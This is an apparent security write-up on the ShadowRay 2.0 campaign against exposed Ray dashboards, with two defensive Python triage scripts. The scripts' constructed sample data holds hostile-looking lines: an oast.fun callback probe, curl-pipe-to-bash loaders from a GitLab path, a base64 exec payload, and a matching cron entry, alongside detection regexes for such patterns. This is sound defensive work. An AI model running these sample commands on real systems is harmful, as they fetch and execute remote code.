ShadowRay 2.0 targets Ray clusters whose dashboard and Jobs API are reachable without authentication. The attackers first use interact.sh (oast.fun) for out-of-band discovery: they POST test jobs to /api/jobs/ whose only purpose is to trigger an HTTP or DNS callback, which confirms both that the dashboard is exposed and that submitted code actually executes. Once a host calls back, they submit multi-stage Bash and Python payloads as ordinary Ray jobs to obtain remote code execution (the behavior tracked as CVE-2023-48022; Anyscale disputes it as a vulnerability because the Jobs API is designed to run arbitrary code and the dashboard is not meant to be reachable from untrusted networks, which is exactly why an exposed dashboard is equivalent to unauthenticated RCE). The payloads perform environment reconnaissance (CPU/GPU count, cloud context, credentials), search for cloud and database secrets, and then use Ray's NodeAffinitySchedulingStrategy to pin malware tasks to every alive node in the cluster, achieving lateral movement entirely through legitimate orchestration features rather than additional exploits.
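Because every stage above is an ordinary job submission, the dashboard's own job listing is the first place to look on a cluster that may have been exposed. The following is an added triage script (not from the report and not part of the Ray project) that flags ShadowRay-style submissions. It assumes the JSON shape returned by the Ray dashboard's GET /api/jobs/ endpoint (a list of objects carrying submission_id, entrypoint, runtime_env and status); the indicator patterns and the sample listing are constructed for illustration, and the gitlab.com path in the sample is invented.

```python
"""Triage a Ray Jobs API listing for ShadowRay-style job submissions.

Added example, not the report's tooling.  Assumes GET /api/jobs/ returns a
JSON list of job records with "submission_id", "entrypoint", "runtime_env"
and "status"; SAMPLE_LISTING below is constructed for illustration.
"""
import json
import re

# Indicators taken from the campaign description: out-of-band callback domains,
# pipe-to-shell loaders, encoded payloads, cluster-wide fan-out and DevOps-style
# C2 hosting.  The regexes are assumptions chosen for illustration.
SUSPICIOUS = [
    ("oob-callback", re.compile(r"\b(?:oast\.fun|interact\.sh)\b")),
    ("pipe-to-shell", re.compile(r"(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b")),
    ("base64-decode", re.compile(r"base64\s+(?:-d|--decode)|b64decode")),
    ("node-fanout", re.compile(r"NodeAffinitySchedulingStrategy")),
    ("devops-c2", re.compile(
        r"(?:gitlab\.com/\S+/-/raw/|raw\.githubusercontent\.com/|"
        r"github\.com/\S+/releases/download/)")),
]


def triage_jobs(listing: str) -> list[dict]:
    """Return one finding per job whose entrypoint or runtime_env matches."""
    findings = []
    for job in json.loads(listing):
        entry = job.get("entrypoint") or ""
        # runtime_env can carry setup commands and URLs, so search it as well.
        env_text = json.dumps(job.get("runtime_env") or {})
        text = entry + "\n" + env_text
        hits = [name for name, rx in SUSPICIOUS if rx.search(text)]
        if hits:
            findings.append({
                "submission_id": job.get("submission_id"),
                "status": job.get("status"),
                "hits": hits,
            })
    return findings


# Constructed sample listing: one benign training job and three probe/loader
# jobs shaped like the stages described in the report.
SAMPLE_LISTING = json.dumps([
    {"submission_id": "raysubmit_aaa", "entrypoint": "python train.py --epochs 3",
     "runtime_env": {"pip": ["torch"]}, "status": "SUCCEEDED"},
    {"submission_id": "raysubmit_bbb",
     "entrypoint": "curl -s http://x.oast.fun/probe || true",
     "runtime_env": {}, "status": "SUCCEEDED"},
    {"submission_id": "raysubmit_ccc",
     "entrypoint": "bash -c 'curl -fsSL https://gitlab.com/acme/infra/-/raw/main/run.sh | bash'",
     "runtime_env": {}, "status": "RUNNING"},
    {"submission_id": "raysubmit_ddd",
     "entrypoint": ("python3 -c \"import ray; from ray.util.scheduling_strategies "
                    "import NodeAffinitySchedulingStrategy; "
                    "exec(__import__('base64').b64decode(PAYLOAD))\""),
     "runtime_env": {}, "status": "RUNNING"},
])


def triage_sample() -> list[dict]:
    """Run the triage over the constructed listing (used by the demo below)."""
    return triage_jobs(SAMPLE_LISTING)


if __name__ == "__main__":
    for finding in triage_sample():
        print(finding["submission_id"], finding["status"], ",".join(finding["hits"]))
```

On a live cluster, replace SAMPLE_LISTING with the body of `curl http://<dashboard>:8265/api/jobs/`; a cluster that answers that request at all from an untrusted network is the finding, regardless of what the listing contains.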
The campaign has proceeded in two waves. In the first, IronErn440 used GitLab as a DevOps-style C2 and distribution platform: compromised nodes pulled updated scripts (e.g. run.sh, run-CN.sh, mon.sh, aa.sh) every 15 minutes via cron jobs and systemd services masquerading as health-check or DNS components. After GitLab banned the accounts in early November 2025, the group rapidly rebuilt the infrastructure on GitHub, hosting miners and loaders in release artifacts and new repositories and moving to more advanced ELF droppers and GPU-optimized miners.

Across both phases the tradecraft is consistent. They deploy XMRig and Rigel miners under masqueraded process names (e.g. kworker/0:0, dns-filter, .python3.6), cap CPU/GPU usage at roughly 60% to avoid obvious performance degradation, hide GPU usage from Ray's metrics, kill competing miners, and block rival pools via /etc/hosts and iptables. Beyond cryptojacking, they add SSH keys for persistent access; exfiltrate MySQL credentials, cloud tokens, source code, and proprietary AI models and datasets; use the sockstress tool for DDoS; and use compromised clusters to spray ShadowRay probes at new Ray instances, effectively turning the botnet into a worm that targets AI infrastructure.
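The persistence and masquerading traits above are cheap to check on a Ray worker. The following host-hunting script is an added example, not the report's tooling: it scores constructed snapshots of `ps -eo pid,ppid,comm,args`, the root crontab and /etc/hosts against the indicators the report names. The real-kernel-thread test (ppid 2, the kthreadd parent) and the sinkhole test (a non-localhost name mapped to 0.0.0.0 or 127.0.0.1) are general checks, not specific to this campaign; the sample lines, paths and domains are constructed.

```python
"""Hunt for ShadowRay-style persistence and masquerading on a Linux host.

Added example, not the report's tooling.  All sample input is constructed;
indicator names and the cron cadence check are assumptions for illustration.
"""
import re
from dataclasses import dataclass

# Process names the report lists as miner disguises.
MASQUERADE_NAMES = {"kworker/0:0", "dns-filter", ".python3.6"}
# Hosting used as C2 in the two waves.
C2_HOSTS = re.compile(r"(?:gitlab\.com|github\.com|raw\.githubusercontent\.com)")
# "*/N * * * * <cmd>": every-N-minutes entries, the cadence the report describes.
CRON_RX = re.compile(r"^\*/(\d+)\s+\*\s+\*\s+\*\s+\*\s+(.*)$")
SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1"}
LOCAL_NAMES = {"localhost", "localhost.localdomain"}


@dataclass
class Finding:
    source: str
    indicator: str
    detail: str


def hunt_processes(ps_lines: list[str]) -> list[Finding]:
    """Real kernel threads are children of kthreadd (ppid 2).  A 'kworker'
    with any other parent is userland code wearing a kernel name; the other
    disguise names are flagged outright."""
    out = []
    for line in ps_lines:
        pid, ppid, comm, *_ = line.split(None, 3)
        kernel_like = comm.startswith("kworker")
        if kernel_like and ppid != "2":
            out.append(Finding("ps", "fake-kernel-thread", line.strip()))
        elif comm in MASQUERADE_NAMES and not kernel_like:
            out.append(Finding("ps", "masquerade-name", line.strip()))
    return out


def hunt_cron(cron_lines: list[str]) -> list[Finding]:
    """Flag every-N-minutes jobs that fetch from C2 hosting or pipe to a shell."""
    out = []
    for line in cron_lines:
        m = CRON_RX.match(line.strip())
        if not m:
            continue
        minutes, cmd = int(m.group(1)), m.group(2)
        if C2_HOSTS.search(cmd) or re.search(r"\|\s*(?:ba)?sh\b", cmd):
            out.append(Finding("cron", f"periodic-fetch-{minutes}m", cmd))
    return out


def hunt_hosts(hosts_lines: list[str]) -> list[Finding]:
    """Flag non-local names pinned to 0.0.0.0/127.0.0.1 (rival-pool sinkholing)."""
    out = []
    for line in hosts_lines:
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2 or fields[0] not in SINKHOLE_IPS:
            continue
        for name in fields[1:]:
            if name not in LOCAL_NAMES and not name.startswith("ip6-"):
                out.append(Finding("hosts", "sinkholed-domain", name))
    return out


# Constructed snapshots (not captured from a real host).
PS_SAMPLE = [
    "  12     2 kworker/0:0     [kworker/0:0]",
    " 901     1 dns-filter      /tmp/.ray/dns-filter -c /tmp/.ray/config.json",
    "2210     1 kworker/0:0     /dev/shm/.x/kworker/0:0",
    "3300     2 kworker/u8:1    [kworker/u8:1]",
    "4100     1 python3         python3 /opt/app/serve.py",
]
CRON_SAMPLE = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew",
    "*/15 * * * * curl -fsSL https://gitlab.com/example/ops/-/raw/main/mon.sh | bash",
]
HOSTS_SAMPLE = [
    "127.0.0.1 localhost",
    "127.0.1.1 gpu-node-3",
    "::1 localhost ip6-localhost ip6-loopback",
    "0.0.0.0 pool.example-rival.invalid  # constructed sinkhole entry",
]


def hunt_all() -> list[Finding]:
    return hunt_processes(PS_SAMPLE) + hunt_cron(CRON_SAMPLE) + hunt_hosts(HOSTS_SAMPLE)


if __name__ == "__main__":
    for f in hunt_all():
        print(f"[{f.source}] {f.indicator}: {f.detail}")
```

The two genuine kworker threads in the sample pass because their parent is pid 2; the miner copying that name from /dev/shm does not. On a real host, also diff the systemd unit list and authorized_keys files against a known-good baseline, since the report notes both as persistence channels.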